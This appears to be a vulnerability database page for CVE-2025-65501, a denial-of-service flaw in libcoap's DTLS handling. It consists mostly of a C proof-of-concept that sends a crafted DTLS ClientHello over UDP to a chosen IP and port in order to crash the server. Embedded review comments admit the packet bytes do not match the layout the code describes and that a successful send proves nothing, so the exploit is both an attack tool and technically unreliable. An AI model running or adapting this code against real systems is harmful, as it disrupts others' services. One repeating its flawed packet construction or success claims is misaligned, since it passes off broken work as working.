Security Vulnerability Report
CVE-2025-65501 CVSS 4.3 MEDIUM

CVE-2025-65501

Published: 2025-11-24 14:15:48
Last Modified: 2025-12-01 16:18:12

Description

Null pointer dereference in coap_dtls_info_callback() in OISM libcoap 4.3.5 allows remote attackers to cause a denial of service via a DTLS handshake where SSL_get_app_data() returns NULL.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:libcoap:libcoap:4.3.5:-:*:*:*:*:*:* - VULNERABLE
libcoap < 4.3.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
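/*
 * CVE-2025-65501 PoC - libcoap DTLS NULL Pointer Dereference
 * This PoC demonstrates sending a malformed DTLS handshake to trigger
 * the NULL pointer dereference in coap_dtls_info_callback()
 *
 * Compile: gcc -o cve202565501_poc cve202565501_poc.c -lssl -lcrypto -lcoap-1 -DDEBUG
 * Usage: ./cve202565501_poc <target_ip> <target_port>
 *
 * NOTE(review): the datagram is emitted byte-for-byte as in the original
 * listing. The handshake header is written at offset 11, directly after the
 * 6-byte record sequence number, and the three stores labelled "Set record
 * length" land at offsets 11+handshake_length .. 13+handshake_length, i.e.
 * after the handshake body. No record-layer length field therefore precedes
 * the handshake header, so the bytes do not match the layout the comments
 * describe. The program never reads anything back from the peer; it only
 * reports that sendto() succeeded. The advisory ties the crash to
 * SSL_get_app_data() returning NULL inside the callback, a server-side
 * state condition, so a successful send is not evidence that the vulnerable
 * path was reached. No OpenSSL or libcoap symbol is referenced by this
 * translation unit, so the -lssl -lcrypto -lcoap-1 -DDEBUG flags are unused;
 * the previously included <openssl/ssl.h> and <openssl/err.h> were dropped
 * for the same reason.
 */
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>          /* close(); was missing, leaving close() implicitly declared */
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/*
 * Fill `packet` with the fixed datagram and store its length in `*length`.
 *
 * Writes offsets 0..69 (70 bytes), so `packet` must hold at least 70 bytes;
 * main()'s 1024-byte buffer satisfies this. The content is constant: no
 * input is consumed and every byte below is the same on every call.
 */
void create_dtls_client_hello(uint8_t *packet, int *length)
{
    /* DTLS Record: Handshake (22) */
    packet[0] = 0x16; /* Handshake */
    /* DTLS Version 1.2 */
    packet[1] = 0xfe;
    packet[2] = 0xfd;
    /* Epoch (2 bytes) */
    packet[3] = 0x00;
    packet[4] = 0x00;
    /* Sequence Number (6 bytes) */
    packet[5] = 0x00;
    packet[6] = 0x00;
    packet[7] = 0x00;
    packet[8] = 0x00;
    packet[9] = 0x00;
    packet[10] = 0x01;

    /* Handshake Header starts at offset 11, immediately after the sequence
     * number. Note that nothing is written between offset 10 and the
     * handshake type byte. */
    int hs_offset = 11;
    /* Handshake Type: ClientHello (1) */
    packet[hs_offset] = 0x01;
    /* Handshake Length (3 bytes) - set later */
    packet[hs_offset + 1] = 0x00;
    packet[hs_offset + 2] = 0x00;
    packet[hs_offset + 3] = 0x00;
    /* Message Sequence */
    packet[hs_offset + 4] = 0x00;
    packet[hs_offset + 5] = 0x00;
    /* Fragment Offset */
    packet[hs_offset + 6] = 0x00;
    packet[hs_offset + 7] = 0x00;
    packet[hs_offset + 8] = 0x00;
    /* Fragment Length - set later */
    packet[hs_offset + 9] = 0x00;
    packet[hs_offset + 10] = 0x00;
    packet[hs_offset + 11] = 0x00;

    int body_offset = hs_offset + 12;
    /* Client Version: DTLS 1.2 */
    packet[body_offset] = 0xfe;
    packet[body_offset + 1] = 0xfd;
    /* Random (32 bytes) - constant 0x01 fill, not random */
    memset(&packet[body_offset + 2], 0x01, 32);
    /* Session ID Length */
    packet[body_offset + 34] = 0x00;
    /* Cookie Length */
    packet[body_offset + 35] = 0x00;
    /* Cipher Suites Length */
    packet[body_offset + 36] = 0x00;
    packet[body_offset + 37] = 0x02;
    /* TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (0xC014) */
    packet[body_offset + 38] = 0xc0;
    packet[body_offset + 39] = 0x14;
    /* Compression Methods */
    packet[body_offset + 40] = 0x01;
    packet[body_offset + 41] = 0x00; /* NULL compression */
    /* Extensions Length */
    packet[body_offset + 42] = 0x00;
    packet[body_offset + 43] = 0x00;

    /* total_length = 67; handshake_length = 56 for the fixed layout above */
    int total_length = body_offset + 44;
    int handshake_length = total_length - hs_offset;

    /* Set handshake length (3-byte big-endian) */
    packet[hs_offset + 1] = (uint8_t)((handshake_length >> 16) & 0xff);
    packet[hs_offset + 2] = (uint8_t)((handshake_length >> 8) & 0xff);
    packet[hs_offset + 3] = (uint8_t)(handshake_length & 0xff);
    /* Set fragment length (same value: the message is not fragmented) */
    packet[hs_offset + 9] = (uint8_t)((handshake_length >> 16) & 0xff);
    packet[hs_offset + 10] = (uint8_t)((handshake_length >> 8) & 0xff);
    packet[hs_offset + 11] = (uint8_t)(handshake_length & 0xff);

    /* Set record length */
    /* NOTE(review): these offsets are 11+handshake_length .. 13+handshake_length
     * (67..69), which is past the last handshake byte (total_length - 1 = 66);
     * the stores append three trailing bytes rather than filling a header
     * field. Kept unchanged so the emitted datagram is identical to the
     * original listing. */
    packet[11 + handshake_length] = 0x00;
    packet[12 + handshake_length] = (uint8_t)((handshake_length >> 8) & 0xff);
    packet[13 + handshake_length] = (uint8_t)(handshake_length & 0xff);

    *length = 14 + handshake_length;
}

/*
 * Parse a decimal UDP port from `s`.
 *
 * Returns the port (1..65535) or -1 when `s` is not a complete decimal
 * number or is out of range. Replaces the original atoi(), which silently
 * returned 0 for garbage and truncated out-of-range values in htons().
 */
static int parse_port(const char *s)
{
    char *end = NULL;
    errno = 0;
    long v = strtol(s, &end, 10);
    if (end == s || *end != '\0' || errno == ERANGE || v < 1 || v > 65535) {
        return -1;
    }
    return (int)v;
}

/*
 * Entry point: validate <target_ip> <target_port>, build the datagram and
 * send it once over a UDP socket.
 *
 * Returns 0 when the whole datagram was handed to sendto(), 1 on usage
 * error, address/port parse failure, socket failure or a short/failed send.
 * The socket is closed on every path after it is created.
 */
int main(int argc, char *argv[])
{
    if (argc != 3) {
        fprintf(stderr, "Usage: %s <target_ip> <target_port>\n", argv[0]);
        return 1;
    }
    const char *target_ip = argv[1];
    int target_port = parse_port(argv[2]);
    if (target_port < 0) {
        fprintf(stderr, "Invalid port: %s\n", argv[2]);
        return 1;
    }

    struct sockaddr_in target = {
        .sin_family = AF_INET,
        .sin_port = htons((uint16_t)target_port),
    };
    /* inet_pton() returns 0 for a string that is not an IPv4 address and -1
     * on error; the original ignored the result and would have sent to
     * 0.0.0.0 (the zeroed sin_addr). Parsed before socket() so no fd is
     * leaked on failure. */
    if (inet_pton(AF_INET, target_ip, &target.sin_addr) != 1) {
        fprintf(stderr, "Invalid IPv4 address: %s\n", target_ip);
        return 1;
    }

    int sock = socket(AF_INET, SOCK_DGRAM, 0);
    if (sock < 0) {
        perror("socket");
        return 1;
    }

    int rc = 1;
    uint8_t packet[1024];
    int packet_len = 0;

    printf("[*] Crafting malformed DTLS ClientHello for CVE-2025-65501\n");
    create_dtls_client_hello(packet, &packet_len);

    printf("[*] Sending DTLS packet to %s:%d\n", target_ip, target_port);
    printf("[*] Packet size: %d bytes\n", packet_len);

    ssize_t sent = sendto(sock, packet, (size_t)packet_len, 0,
                          (struct sockaddr *)&target, sizeof(target));
    if (sent < 0) {
        perror("sendto");
        goto out;
    }
    /* A datagram is sent whole or not at all, but report a mismatch rather
     * than assume it. */
    if (sent != packet_len) {
        fprintf(stderr, "Short send: %zd of %d bytes\n", sent, packet_len);
        goto out;
    }

    printf("[+] Malformed DTLS ClientHello sent successfully\n");
    printf("[*] If target is vulnerable, it should crash with NULL pointer dereference\n");
    rc = 0;

out:
    close(sock);
    return rc;
}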

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65501", "sourceIdentifier": "[email protected]", "published": "2025-11-24T14:15:47.950", "lastModified": "2025-12-01T16:18:11.947", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Null pointer dereference in coap_dtls_info_callback() in OISM libcoap 4.3.5 allows remote attackers to cause a denial of service via a DTLS handshake where SSL_get_app_data() returns NULL."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libcoap:libcoap:4.3.5:-:*:*:*:*:*:*", "matchCriteriaId": "78120234-9F76-4010-AD0E-FEA4DE8A76F9"}]}]}], "references": [{"url": "https://github.com/obgm/libcoap/issues/1748", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/obgm/libcoap/pull/1750", "source": "[email protected]", "tags": ["Issue Tracking"]}]}}